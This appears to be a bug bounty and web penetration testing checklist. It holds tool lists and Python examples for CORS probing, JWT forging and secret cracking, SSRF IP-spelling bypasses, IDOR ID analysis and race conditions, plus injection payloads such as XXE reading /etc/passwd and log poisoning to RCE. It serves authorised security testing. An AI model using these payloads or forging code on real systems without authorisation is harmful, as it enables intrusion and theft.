A practitioner-focused methodology and checklist for bug bounty hunting and web application penetration testing. Tight, tool-linked, and structured by attack surface.
For the condensed pre-flight checklist, see BB-Checklist.md.
- Recon & Asset Discovery
- Network Recon
- JavaScript & Client-Side Analysis
- API Testing
- Authentication
- Session Management
- Authorization (IDOR / BAC)
- Input Handling
- Business Logic
- Race Conditions
- HTTP Request Smuggling
- Cloud Misconfigurations
- Mobile (Quick Reference)
- Misc Checks
- Reporting
- Contributing
- License
## Recon & Asset Discovery

### Large Scope
- ASN & IP ranges — Amass, Asnlookup, Metabigor, bgp.he.net
- Acquisitions & subsidiaries — Crunchbase, SEC filings, Wikipedia
- Registrant pivots — ViewDNS Reverse Whois, WhoxyAPI
- Trademark / favicon pivots — Shodan favicon hash, FOFA, ZoomEye
- GitHub recon for the org — trufflehog, github-search, gitleaks
- For each in-scope domain, drop to Medium Scope
### Medium Scope
- Passive subdomain enum — Amass, Subfinder, Assetfinder, crt.sh
- Active bruteforce — PureDNS, shuffledns + six2dez wordlist
- Permutations — Gotator, Ripgen, alterx
- Resolve & probe — dnsx, httpx (capture status, title, tech, CDN, CNAME)
- Subdomain takeover — Nuclei takeover templates, subzy, dnsReaper (confirm the fingerprint manually before reporting; a dangling CNAME alone is not a takeover)
- Cloud asset discovery — cloud_enum, S3Scanner
- Visual recon — gowitness, Aquatone, eyeballer
- Historical hostnames — waybackurls, gau, Chaos
- Port-scan all live hosts — see Network Recon
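The resolve-and-probe step produces one JSON object per host; the next decisions (takeover candidates, what to port-scan, which tech stacks to prioritise) are all filters over that output. The following Python triage pass is an added example, not part of the original checklist. It runs over a constructed sample of httpx `-json` output; the field names (`url`, `host`, `status_code`, `title`, `tech`, `cdn`, `cname`) are assumed to match httpx's JSON schema, and the provider fingerprint table is an illustrative subset that must be checked against a current takeover fingerprint list before anything is reported.

```python
import json
from collections import defaultdict

# Constructed sample of httpx -json output (one object per line). Not real hosts.
HTTPX_JSONL = """
{"url":"https://app.example.com","host":"app.example.com","status_code":200,"title":"App Login","tech":["Nginx","React"],"cdn":true,"cdn_name":"cloudflare","cname":[]}
{"url":"https://docs.example.com","host":"docs.example.com","status_code":404,"title":"There isn't a GitHub Pages site here.","tech":["GitHub Pages"],"cdn":false,"cname":["example.github.io"]}
{"url":"https://shop.example.com","host":"shop.example.com","status_code":404,"title":"NoSuchBucket","tech":[],"cdn":false,"cname":["shop-example.s3.amazonaws.com"]}
{"url":"http://legacy.example.com","host":"legacy.example.com","status_code":200,"title":"Apache Tomcat/8.5.3","tech":["Apache Tomcat","Java"],"cdn":false,"cname":[]}
{"url":"https://status.example.com","host":"status.example.com","status_code":200,"title":"Status","tech":["Statuspage"],"cdn":false,"cname":["example.statuspage.io"]}
"""

# Illustrative subset: CNAME suffix -> text the provider serves for an unclaimed resource.
# Assumption for this example; verify against the list nuclei/subzy ship before reporting.
TAKEOVER_FINGERPRINTS = {
    "github.io": "there isn't a github pages site here",
    "s3.amazonaws.com": "nosuchbucket",
    "herokuapp.com": "no such app",
    "azurewebsites.net": "error 404 - web app not found",
}


def parse_httpx(jsonl: str) -> list:
    """Parse httpx JSONL, skipping blank or malformed lines instead of aborting the run."""
    rows = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rows.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return rows


def takeover_candidates(rows: list) -> list:
    """(host, cname) pairs whose CNAME points at a known provider AND whose title carries that
    provider's 'unclaimed' fingerprint. httpx only captures the title; run it with
    -store-response and match on the body if the fingerprint is not in the title."""
    hits = []
    for r in rows:
        title = (r.get("title") or "").lower()
        for cname in r.get("cname") or []:
            for suffix, fingerprint in TAKEOVER_FINGERPRINTS.items():
                if cname.lower().endswith(suffix) and fingerprint in title:
                    hits.append((r["host"], cname))
    return hits


def by_tech(rows: list) -> dict:
    """Group live hosts by detected technology so version-specific checks can be batched."""
    groups = defaultdict(list)
    for r in rows:
        for tech in r.get("tech") or []:
            groups[tech].append(r["host"])
    return dict(groups)


def portscan_targets(rows: list) -> list:
    """Hosts not fronted by a CDN: scanning a CDN edge tells you about the CDN, not the target."""
    return sorted(r["host"] for r in rows if not r.get("cdn"))


if __name__ == "__main__":
    rows = parse_httpx(HTTPX_JSONL)
    print("takeover candidates:", takeover_candidates(rows))
    print("port-scan targets:", portscan_targets(rows))
    for tech, hosts in sorted(by_tech(rows).items()):
        print(f"{tech}: {', '.join(hosts)}")
```

Pipe real output in with `httpx -l resolved.txt -json -title -tech-detect -cdn -cname > probe.jsonl` and replace the constructed string with the file contents.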
### Small Scope
- Tech fingerprinting — httpx, whatweb, Wappalyzer
- Common files — `/robots.txt`, `/sitemap.xml`, `/.well-known/`, `/.git/`, `/.env`, `/server-status`, `/crossdomain.xml`
- Crawl + passive URL harvest — katana, hakrawler, gau, waybackurls
- Content discovery — feroxbuster, ffuf, dirsearch + OneListForAll
- Parameter discovery — Arjun, ParamSpider, x8
- CORS — CORScanner, Corsy; manually test `Origin: null`, wildcard with credentials, regex bypasses
- Nuclei sweep — `nuclei -severity medium,high,critical`
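Scanners report "CORS misconfiguration" far more often than a real cross-origin read exists, so it pays to know which probe origins exercise which validation bug and which responses actually matter. The block below is an added example (not from the original checklist): it generates the probe origins for a target origin, classifies a response by its `Access-Control-Allow-Origin` / `Access-Control-Allow-Credentials` headers, and runs both against a simulated server with a typical unanchored "contains" check versus an exact allowlist. `victim.example`, the allowlist contents and `simulate_server` are assumptions for the demonstration; against a live target you would send each origin with your own HTTP client and feed the real headers to `evaluate_cors`.

```python
from urllib.parse import urlsplit


def cors_probe_origins(target_origin: str) -> list:
    """Origins that each exercise a different validation mistake against target_origin."""
    parts = urlsplit(target_origin)
    scheme, host = parts.scheme, parts.hostname
    return [
        "https://evil.example",                     # blanket reflection of any Origin
        "null",                                     # sandboxed iframes, file:// and data: pages send Origin: null
        f"{scheme}://evil{host}",                   # suffix check with no leading dot: evilvictim.example
        f"{scheme}://{host}.evil.example",          # prefix check: victim.example.evil.example
        f"{scheme}://attacker.{host}",              # any subdomain trusted: one subdomain XSS becomes a full read
        f"http://{host}",                           # http origin trusted by an https site: network MitM reads responses
        f"{scheme}://{host.replace('.', 'x', 1)}",  # unescaped '.' in a regex: victimxexample
    ]


def evaluate_cors(request_origin: str, target_origin: str, response_headers: dict) -> str:
    """Classify one response. Only 'reflected+credentials' lets an attacker page read authenticated data."""
    h = {k.lower(): v for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"
    if acao == "*":
        # Browsers refuse to attach cookies to an ACAO:* response, so this exposes public data only.
        return "wildcard"
    if acao == target_origin:
        return "same-origin-only"
    if acao == request_origin:
        return "reflected+credentials" if creds else "reflected"
    return "other"


# Two server-side checks to compare. The vulnerable one is the common unanchored 'contains' test.
def vulnerable_origin_check(origin: str, allowed_host: str = "victim.example") -> bool:
    return allowed_host in origin


ALLOWLIST = frozenset({"https://victim.example", "https://app.victim.example"})  # assumed for the example


def hardened_origin_check(origin: str, allowlist=ALLOWLIST) -> bool:
    """Exact match on the full origin (scheme + host + port) against a fixed list; never trust 'null'."""
    return origin in allowlist


def simulate_server(origin: str, check) -> dict:
    """Stand-in for the target: reflects the Origin with credentials whenever the check passes."""
    if check(origin):
        return {"Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true"}
    return {}


def run_probes(target_origin: str, check) -> dict:
    """Map each probe origin to its verdict for the given server-side check."""
    return {o: evaluate_cors(o, target_origin, simulate_server(o, check))
            for o in cors_probe_origins(target_origin)}


if __name__ == "__main__":
    for origin, verdict in run_probes("https://victim.example", vulnerable_origin_check).items():
        print(f"{verdict:22} {origin}")
```

When a probe comes back `reflected+credentials`, the proof is a page on that origin doing `fetch(target, {credentials: "include"})` and reading the body; without credentials the finding is usually informational.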
## Network Recon
- Full TCP — `nmap -p- --min-rate 5000 -T4 <target>`, then `-sCV` on the open ports (check the program's rate-limit rules first; aggressive rates drop packets and trip WAFs)
- UDP top ports — `nmap -sU --top-ports 200`
- Mass scan — masscan, naabu
- TLS/SSL — testssl.sh, sslyze
- Email spoofing — SpoofCheck (DMARC/SPF/DKIM)
- Service-specific — SMB, RDP, Redis, Memcached, MongoDB, Elasticsearch, Docker API exposure
## JavaScript & Client-Side Analysis
- Collect JS — subjs, getJS, katana with `-jc`
- Endpoint extraction — LinkFinder, xnLinkFinder, JSluice
- Secrets in JS — trufflehog, SecretFinder, Nosey Parker
- Source map review — pull `.map` files, reconstruct the original source with sourcemapper
- DOM sinks — Burp DOM Invader, manual review of `eval`, `innerHTML`, `document.write`, `postMessage`, `location.*`
- Webpack analysis — webpack-exploder
## API Testing

### REST
- Spec discovery — `/swagger`, `/swagger.json`, `/api-docs`, `/openapi.json`, `/v1/`, `/v2/`, `/graphql`
- Verb tampering — try `PUT`, `DELETE`, `PATCH`, `OPTIONS` on `GET` endpoints
- Content-type confusion — swap `application/json` ↔ `application/xml` ↔ `application/x-www-form-urlencoded`
- Mass assignment — add `isAdmin`, `role`, `verified`, `userId` to payloads
- Rate limit bypass — `X-Forwarded-For`, `X-Real-IP`, `X-Originating-IP`, casing changes, null bytes, path/param mutation
- Versioning — test old API versions (`/v1/` may lack fixes present in `/v2/`)
- Kiterunner for content discovery on APIs (uses HTTP verbs and routes wordlists)
### GraphQL
- Introspection — `{__schema{types{name fields{name}}}}`; if disabled, try clairvoyance
- IDE access — `/graphql`, `/graphiql`, `/playground`, `/console`
- Batching attacks — send an array of queries in one request to bypass per-request rate limits / brute force
- Alias-based abuse — the same mutation repeated under different aliases in a single operation for brute force
- Field suggestion leak — typo a field name; the "Did you mean ...?" error leaks the schema even with introspection off
- Mutation enumeration — focus on `delete*`, `update*`, `create*` and anything matching `*Admin*`
- Tools — InQL, graphql-cop, graphw00f
## Authentication
- Username enumeration via login, register, password reset, response timing
- Password policy (length, complexity, common-password rejection, breach check)
- Brute force resilience — account lockout, IP throttling, CAPTCHA after N attempts
- 2FA — bypass via response manipulation, backup code abuse, race conditions, missing rate limits on OTP, OTP reuse
- Password reset — token entropy/reuse, host header injection, `email[]=victim&email[]=attacker`, Unicode normalization
- OAuth — `redirect_uri` validation (path traversal, open redirect, subdomain), `state` parameter (CSRF), implicit flow leaks, scope upgrade
- SAML — XML signature wrapping, comment injection, `xmlns` confusion, SAML Raider
- JWT — `alg: none`, `alg: HS256` with the public key as the HMAC secret (RS256→HS256 confusion), `kid` injection (path traversal, SQLi), JWK injection, weak HMAC secret (jwt_tool, hashcat)
- SSO — host header / session confusion between SP and IdP
- Magic links — predictable tokens, no expiry, reuse, login CSRF
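The JWT bullets all come down to one server-side mistake: letting the token's own header choose how it is verified. The block below is an added example, not code from the original checklist, using only the standard library: it mints tokens (signed, `alg: none`, and the same call with a public-key PEM as the secret gives the RS256→HS256 confusion token), shows a verifier that trusts the header beside one that pins the algorithm, and runs a wordlist against an HS256 signature the way jwt_tool or hashcat would. The secret, payloads and wordlist are constructed for the example.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256(signing_input: bytes, secret: bytes) -> str:
    return b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())


def make_token(payload: dict, secret: bytes, alg: str = "HS256") -> str:
    """Mint a token. alg='none' (any casing) yields the unsigned form; alg='HS256' with
    secret=<the server's RSA public-key PEM bytes> yields the RS256->HS256 confusion token."""
    def enc(obj):
        return b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = f"{enc({'alg': alg, 'typ': 'JWT'})}.{enc(payload)}"
    if alg.lower() == "none":
        return signing_input + "."
    return signing_input + "." + hs256(signing_input.encode(), secret)


def vulnerable_verify(token: str, secret: bytes):
    """Trusts the header: 'none' (in any casing) skips the signature check entirely."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg", "").lower() == "none":
        return json.loads(b64url_decode(p))
    if hmac.compare_digest(hs256(f"{h}.{p}".encode(), secret), s):
        return json.loads(b64url_decode(p))
    return None


def hardened_verify(token: str, secret: bytes, expected_alg: str = "HS256"):
    """The server decides the algorithm: header must match exactly, a signature must be present,
    and the comparison is constant-time. Malformed tokens fail closed."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != expected_alg or not s:
        return None
    if not hmac.compare_digest(hs256(f"{h}.{p}".encode(), secret), s):
        return None
    return json.loads(b64url_decode(p))


def crack_hs256(token: str, wordlist):
    """Offline weak-secret check: re-sign the token with each candidate and compare."""
    h, p, s = token.split(".")
    for word in wordlist:
        if hmac.compare_digest(hs256(f"{h}.{p}".encode(), word.encode()), s):
            return word
    return None


if __name__ == "__main__":
    secret = b"s3cr3t"                                   # constructed weak secret
    forged = make_token({"sub": "1", "role": "admin"}, b"", alg="None")
    print("vulnerable accepts alg=None:", vulnerable_verify(forged, secret))
    print("hardened accepts alg=None:", hardened_verify(forged, secret))
    legit = make_token({"sub": "1"}, secret)
    print("cracked secret:", crack_hs256(legit, ["password", "secret", "s3cr3t"]))
```

For a real RS256 target the confusion test is `make_token(payload, open("pub.pem","rb").read(), "HS256")`; if the server's RS256 path and HS256 path share one key argument, the public key becomes the HMAC secret and the forged token verifies.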
## Session Management
- Session fixation — does login regenerate the session ID?
- CSRF — token presence, validation, reuse across users, `SameSite` cookie attribute
- Cookie flags — `HttpOnly`, `Secure`, `SameSite`, `__Host-`/`__Secure-` prefixes
- Logout — server-side invalidation? Token usable post-logout?
- Concurrent sessions — does login N+1 kill session N?
- Timeout — idle vs absolute
- Session token entropy and predictability
## Authorization (IDOR / BAC)
- Horizontal — swap IDs (numeric, UUID, base64, hashed) between two test accounts
- Vertical — low-priv user accessing admin endpoints; check the direct URL, not just the UI
- Method-based — same path, different verb (`GET` denied, `POST`/`PUT` allowed); also endpoints hidden from the UI but reachable by direct request
- Parameter pollution — `?user=victim&user=attacker` (frameworks differ on whether the first or last value wins)
- ID encoding — try wrapping the ID in an array, a JSON object, a different encoding
- Mass IDOR — Autorize (Burp), AuthMatrix
- GUIDs / UUIDs — check for v1 (timestamp-predictable) vs v4 (random)
- Tenant isolation — multi-tenant apps: try IDs from tenant A while logged in as tenant B
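Whether an IDOR is exploitable at scale depends on how guessable the identifiers are, and the answer sits in the ID format itself. The block below is an added example, not part of the original checklist: it classifies an identifier (numeric, base64-wrapped numeric, hex digest, UUID by version) and, for a v1 UUID, extracts the creation timestamp, node and clock sequence that make neighbouring IDs predictable. The sample IDs are the RFC 4122 DNS namespace UUID and constructed values.

```python
import base64
import binascii
import re
import uuid
from datetime import datetime, timedelta, timezone

# RFC 4122 v1 timestamps are 100 ns ticks since the Gregorian reform date.
UUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)
HYPHENATED_UUID = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
HEX_DIGEST = re.compile(r"[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}", re.I)   # md5 / sha1 / sha256 widths


def uuid_v1_details(u: uuid.UUID) -> dict:
    """The fields that make a v1 UUID predictable: creation time, node (usually a MAC), clock sequence."""
    return {
        "timestamp": UUID_EPOCH + timedelta(microseconds=u.time // 10),
        "node": f"{u.node:012x}",
        # Multicast bit set means the node was randomised (RFC 4122 4.5) rather than a real MAC.
        "node_is_random": bool((u.node >> 40) & 1),
        "clock_seq": u.clock_seq,
    }


def classify_id(value: str) -> dict:
    """Classify an object identifier by how it was likely generated and whether neighbours are guessable."""
    v = value.strip()
    if v.isdigit():
        return {"kind": "numeric", "guessable": True, "note": "walk neighbouring values"}
    if HYPHENATED_UUID.fullmatch(v):
        u = uuid.UUID(v)
        if u.variant != uuid.RFC_4122:
            return {"kind": "uuid-nonstandard", "guessable": None}
        if u.version == 1:
            return {"kind": "uuid-v1", "guessable": True, **uuid_v1_details(u)}
        # v3/v5 derive from a name (guessable if the name is), v6/v7 are time-ordered; v4 is random.
        return {"kind": f"uuid-v{u.version}", "guessable": u.version != 4}
    if HEX_DIGEST.fullmatch(v):
        return {"kind": "hex-digest", "guessable": False,
                "note": "try md5/sha1/sha256 of a numeric id, username or email"}
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            raw = decoder(v + "=" * (-len(v) % 4))
        except (binascii.Error, ValueError):
            continue
        if raw.isdigit():
            return {"kind": "base64-numeric", "guessable": True, "decoded": raw.decode()}
        if re.fullmatch(rb"\w+:\d+", raw):                  # e.g. "user:1042"
            return {"kind": "base64-typed-numeric", "guessable": True, "decoded": raw.decode()}
    return {"kind": "opaque", "guessable": None, "note": "collect several and compare for structure"}


if __name__ == "__main__":
    for sample in ("1042", "MTA0Mg==", "dXNlcjoxMDQy",
                   "6ba7b810-9dad-11d1-80b4-00c04fd430c8", str(uuid.uuid4())):
        print(sample, "->", classify_id(sample))
```

A v1 UUID handed out for one object lets you bound the others: same node, same clock sequence, and timestamps within the window in which the objects were created.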
## Input Handling

### XSS
- Reflected/stored — Dalfox, XSStrike, manual payload tuning
- DOM — Burp DOM Invader, manual sink analysis
- Blind XSS — XSS Hunter Express, Interactsh
- CSP bypass — review `Content-Security-Policy`; look for `unsafe-inline`, `unsafe-eval`, overly broad CDNs, JSONP endpoints; csp-evaluator
- Filter bypass — case, encoding, event handlers, SVG, `<details>`, `<dialog open ontoggle>`, mutation XSS
### SQL / NoSQL Injection
- Manual probe — `'`, `''`, `"`, `--`, `OR 1=1`, time-based payloads
- Automation — sqlmap with `--risk=3 --level=5` (in scope only: risk 3 adds `OR`-based payloads that can modify data in `UPDATE`/`DELETE` statements)
- Blind boolean / time-based — when there is no output reflection
- NoSQL — `{"$ne": null}`, `{"$gt": ""}`, `{"$regex": ".*"}` (MongoDB)
- 2nd-order — payload stored, then triggered elsewhere
- ORM-specific quirks — Hibernate HQL, Sequelize, Prisma
### SSRF
- Standard targets — `http://127.0.0.1`, `http://localhost`, `http://[::]`, `http://0.0.0.0`
- Cloud metadata — AWS `169.254.169.254`, GCP `metadata.google.internal`, Azure `169.254.169.254/metadata/instance`, IMDSv2 token flow
- DNS rebinding — singularity
- Bypasses — decimal/octal IPs, URL parser differences, `@` confusion, redirect chains, gopher/file/dict schemes (Gopherus)
- Blind SSRF — out-of-band via interactsh, Burp Collaborator
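Most SSRF "fixes" are a string blocklist, and the decimal/octal/hex bypasses work because the URL library's address parser accepts forms the blocklist never sees. The block below is an added example, not from the original checklist: it generates the alternate spellings of an IPv4 address that `inet_aton` accepts, shows a string blocklist missing all of them, and a hardened check that canonicalises through `socket.inet_aton` / `ipaddress` and then blocks anything that is not a public unicast address (loopback, link-local including the metadata IP, private, unspecified, multicast, IPv4-mapped IPv6). The blocklist contents and the test addresses are constructed; the shorthand forms depend on the libc `inet_aton`, which on glibc accepts all of them.

```python
import ipaddress
import socket

# A string blocklist of the kind often shipped as an SSRF fix. Constructed for the example.
BLOCKLIST = {"127.0.0.1", "localhost", "169.254.169.254", "0.0.0.0", "::1", "metadata.google.internal"}


def naive_is_blocked(host: str) -> bool:
    return host.lower() in BLOCKLIST


def ssrf_host_variants(ip: str) -> list:
    """Alternate spellings of one IPv4 address that resolve to it but never string-match it."""
    packed = socket.inet_aton(ip)
    n = int.from_bytes(packed, "big")
    a, b, c, d = packed
    return [
        str(n),                                     # dotless decimal: 2130706433
        f"0x{n:08x}",                               # dotless hex: 0x7f000001
        f"0{n:o}",                                  # dotless octal: 017700000001
        f"{a}.{b}.{(c << 8) | d}",                  # three-part form: 127.0.1
        f"{a}.{(b << 16) | (c << 8) | d}",          # two-part form: 127.1
        f"0x{a:02x}.0x{b:02x}.0x{c:02x}.0x{d:02x}", # hex octets
        f"0{a:o}.0{b:o}.0{c:o}.0{d:o}",             # octal octets: 0177.00.00.01
        f"::ffff:{ip}",                             # IPv4-mapped IPv6, dotted
        f"::ffff:{a:02x}{b:02x}:{c:02x}{d:02x}",    # IPv4-mapped IPv6, hex groups
    ]


def canonical_ip(host: str):
    """Normalise any IP spelling to an ipaddress object, or None if it is not an IP literal."""
    h = host.strip().strip("[]")
    try:
        return ipaddress.ip_address(h)          # dotted-quad IPv4 and every IPv6 form
    except ValueError:
        pass
    try:
        packed = socket.inet_aton(h)            # 2130706433, 0x7f000001, 0177.0.0.1, 127.1 ...
    except OSError:
        return None
    return ipaddress.IPv4Address(packed)


def hardened_is_blocked(host: str) -> bool:
    """Allow only public unicast addresses. Hostnames must be resolved first and every returned
    address checked, and the connection then pinned to that exact address so a rebinding DNS
    answer cannot swap in an internal IP between the check and the fetch."""
    ip = canonical_ip(host)
    if ip is None:
        return True                             # not an IP literal: resolve and re-check, never pass through
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return (not ip.is_global) or ip.is_multicast


if __name__ == "__main__":
    for v in ssrf_host_variants("127.0.0.1"):
        print(f"{v:24} naive blocked={naive_is_blocked(v)!s:5} hardened blocked={hardened_is_blocked(v)}")
```

`is_global` is false for loopback, link-local (so `169.254.169.254`), RFC 1918, shared address space, the unspecified address and reserved ranges; multicast is excluded separately because older Python versions count it as global.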
### SSTI
- Polyglot probe — `${{<%[%'"}}%\`
- Engine-specific payloads — Jinja2 `{{7*7}}`, Twig `{{7*'7'}}`, Freemarker `<#assign>`, ERB `<%= %>`
- tplmap for automation
- PortSwigger SSTI labs map almost 1:1 to real targets
### XXE
- Classic — `<!ENTITY xxe SYSTEM "file:///etc/passwd">`
- Blind — OOB DTD via Burp Collaborator
- Parameter entities, SVG upload XXE, DOCX/XLSX/ODT XXE, SOAP XXE
- Billion laughs / quadratic blowup for DoS (only if in scope)
### LFI / Path Traversal
- Traversal — `../`, encoded variants, `....//`, null byte (legacy), PHP filter wrappers (`php://filter/convert.base64-encode/resource=`)
- Log poisoning → RCE
- Wordlists — LFI-Payloads
### Command Injection
- Separators — `;`, `&&`, `|`, `` ` ``, `$()`, newline
- Blind — DNS/HTTP OOB callbacks
- commix for automation
### Prototype Pollution
- Client-side — pollute via URL/JSON, check the sink with PP-finder or DOM Invader
- Server-side (Node.js) — `__proto__`, `constructor.prototype` in JSON bodies
- Gadgets per framework (Express, Mongoose, Lodash)
## Business Logic
- Multi-step flow tampering — skip steps, replay, modify hidden state
- Price/quantity manipulation — negative numbers, decimal precision, currency confusion, integer overflow
- Coupon/voucher logic — stack multiple, reuse, race-apply
- Workflow bypass — KYC, age gates, terms acceptance
- Numeric edge cases — `0`, `-1`, `MAX_INT`, very large floats, scientific notation, `NaN`/`Infinity`
- Client-side validation only — disable JS, intercept and modify
- File upload — extension/MIME/magic-byte mismatch, polyglots, double extension, SVG XSS, path traversal in filename, zip slip
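The price and numeric-edge-case bullets share a root cause: the handler parses user input with `float()`/`int()` and then applies a "not negative" check that several inputs sail past. The block below is an added example, not from the original checklist: a typical vulnerable total calculation beside a hardened one that parses money as `Decimal`, rejects non-finite values, scientific notation, fractional or negative quantities, sub-cent prices and out-of-range values. The limits and the sample inputs are constructed for the example; in a real application the price would come from the catalogue, not the request, but hidden-field price tampering is exactly the case where a handler does trust it.

```python
from decimal import Decimal, InvalidOperation, ROUND_HALF_UP

MAX_QTY = 10_000                      # assumed business limits for the example
MAX_PRICE = Decimal("1000000.00")
CENT = Decimal("0.01")


def vulnerable_total(price: str, qty: str) -> float:
    """Typical handler: float() on user input and a 'not negative' check with no bounds."""
    p, q = float(price), float(qty)
    if p < 0 or q < 0:                # NaN compares False here, so 'nan' passes
        raise ValueError("negative")
    return p * q                      # '1e3' quantity, '1e400' price, 'nan' all get through


def hardened_total(price: str, qty: str) -> Decimal:
    """Decimal money, explicit finiteness, precision and range checks, integer-only quantity."""
    try:
        p = Decimal(price)
    except InvalidOperation:
        raise ValueError("bad price")
    if not p.is_finite():                        # rejects NaN, sNaN, Infinity
        raise ValueError("price not finite")
    if p < 0 or p > MAX_PRICE:
        raise ValueError("price out of range")
    if p != p.quantize(CENT):                    # rejects 0.004, which would round to 0.00
        raise ValueError("price precision")
    if not qty.isdigit():                        # rejects '-1', '1e3', '1.5', ' 1', ''
        raise ValueError("quantity must be a positive integer")
    q = int(qty)
    if not 1 <= q <= MAX_QTY:
        raise ValueError("quantity out of range")
    return (p * q).quantize(CENT, rounding=ROUND_HALF_UP)


def rejected_by_hardened(price: str, qty: str) -> bool:
    """True if the hardened path refuses the input."""
    try:
        hardened_total(price, qty)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    probes = [("nan", "1"), ("10", "1e3"), ("1e400", "1"), ("0.004", "1"), ("9.99", "-1"), ("9.99", "3")]
    for price, qty in probes:
        try:
            v = vulnerable_total(price, qty)
        except ValueError as e:
            v = f"rejected ({e})"
        print(f"price={price!r:8} qty={qty!r:6} vulnerable={v!s:18} hardened_rejects={rejected_by_hardened(price, qty)}")
```

The `nan` case is the one to test first: a NaN total fails every `total > balance` comparison downstream, so the purchase is approved with nothing charged.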
## Race Conditions
- Burp Repeater "send group in parallel" / single-packet attack (HTTP/2)
- Turbo Intruder `race.py` template
- High-value targets — coupon redemption, gift card claim, withdrawal, vote, like, follow, MFA verify
- Reference: PortSwigger's "Smashing the state machine"
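The single-packet attack and `race.py` exist to land many requests inside the window between an application's check and its write. The block below is an added example, not code from the original checklist: it models a one-time coupon with a check-then-act redemption beside an atomic one, and a `fire_in_parallel` helper that releases N threads from a barrier at once, which is the local approximation of "send group in parallel" (true last-byte sync against a network target still needs Turbo Intruder or Burp). The coupon store, the simulated database round trip and the thread count are constructed for the example.

```python
import threading
import time


class CouponStore:
    """One-time coupon. redeem_vulnerable leaves a window between the read and the write;
    redeem_safe makes the test-and-set atomic."""

    def __init__(self):
        self._lock = threading.Lock()
        self.redeemed = False
        self.credits_granted = 0

    def redeem_vulnerable(self) -> bool:
        if self.redeemed:                      # SELECT redeemed FROM coupons WHERE ...
            return False
        time.sleep(0.01)                       # stands in for the round trip before the UPDATE
        self.redeemed = True                   # UPDATE coupons SET redeemed = 1 ...
        self.credits_granted += 1              # every thread that passed the check grants credit
        return True

    def redeem_safe(self) -> bool:
        with self._lock:                       # real app: UPDATE ... WHERE redeemed = 0 and check rows affected,
            if self.redeemed:                  # or SELECT ... FOR UPDATE inside one transaction
                return False
            self.redeemed = True
        time.sleep(0.01)
        self.credits_granted += 1
        return True


def fire_in_parallel(fn, n: int) -> list:
    """Release n threads at the same instant so their calls land inside the same window.
    Against a live target fn would send one pre-built HTTP request and return the response."""
    barrier = threading.Barrier(n)
    results = [None] * n

    def worker(i):
        barrier.wait()
        results[i] = fn()

    threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def race_coupon(n: int = 20) -> tuple:
    """Return (credits granted by the vulnerable store, credits granted by the safe store)."""
    vulnerable, safe = CouponStore(), CouponStore()
    fire_in_parallel(vulnerable.redeem_vulnerable, n)
    fire_in_parallel(safe.redeem_safe, n)
    return vulnerable.credits_granted, safe.credits_granted


if __name__ == "__main__":
    v, s = race_coupon()
    print(f"vulnerable store granted {v} credits for one coupon; safe store granted {s}")
```

When reporting, the count of duplicate side effects (credits, withdrawals, votes) from one resource is the impact statement; include the request group and the timing setup so the triager can reproduce it.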
## HTTP Request Smuggling
- CL.TE / TE.CL / TE.TE / CL.CL detection — smuggler, Burp HTTP Request Smuggler
- HTTP/2 downgrade smuggling (H2.CL, H2.TE)
- Browser-powered ("client-side") desync
- Validate impact — cache poisoning, auth bypass, request hijacking (a timing difference alone is not a finding)
## Cloud Misconfigurations
- S3 — public read/write, ACL misconfigs, bucket takeover (S3Scanner)
- GCP buckets — same idea, `storage.googleapis.com/<bucket>`
- Azure Blob — `<account>.blob.core.windows.net`
- Cloud metadata via SSRF — covered above
- IAM — overly permissive policies, leaked AWS keys (trufflehog)
- Lambda/Functions — env vars, source via console
- Misconfigured CloudFront / Cloudflare — origin IP disclosure (CloudFail)
## Mobile (Quick Reference)
- APK/IPA static — MobSF, apktool, jadx
- iOS dynamic — Frida, Objection, Cycript
- SSL pinning bypass — Frida scripts (frida-scripts)
- Hardcoded secrets — same JS-style hunt against the decompiled source
- Deep links / URL schemes — intent redirection, WebView abuse
- Backup analysis — `adb backup`, plist files on iOS
## Misc Checks
- Security headers — `Strict-Transport-Security`, `Content-Security-Policy`, `X-Frame-Options`, `X-Content-Type-Options`, `Referrer-Policy`, `Permissions-Policy` (note: many of these are informational findings on most programs)
- CAPTCHA — OCR (Tesseract), reuse of a solved token, removal of the CAPTCHA parameter, automation of the audio CAPTCHA
- Open redirect — useful as a chain primitive (OAuth, SSRF filter bypass)
- Cache poisoning — unkeyed headers, parameter cloaking (Param Miner)
- Web cache deception — `/account.php/nonexistent.css`
- Dependency confusion — internal package names published publicly on npm/PyPI
- Email injection — header injection in contact forms, SMTP smuggling
## Reporting
A solid report is often the gap between a bounty and a "won't fix":
- Clear, single-sentence title with impact
- Severity per program rules (avoid self-rating CVSS without justification)
- Steps to reproduce — numbered, copy-pasteable, no missing context
- Proof — screenshot or short video; redact your own creds
- Impact — what could an attacker actually do? Tie it to the program's stated assets/data
- Remediation — short, suggestive, not prescriptive
- Don't include unrelated findings in one report — file separately
## Contributing
PRs welcome. Useful additions: new tools that meaningfully change a workflow, missing attack classes, real-world bypasses. Please keep entries tight and link to authoritative sources.
## License
MIT — use freely, attribution appreciated.
This is a living document. Methodology evolves; treat it as a scaffold, not a script.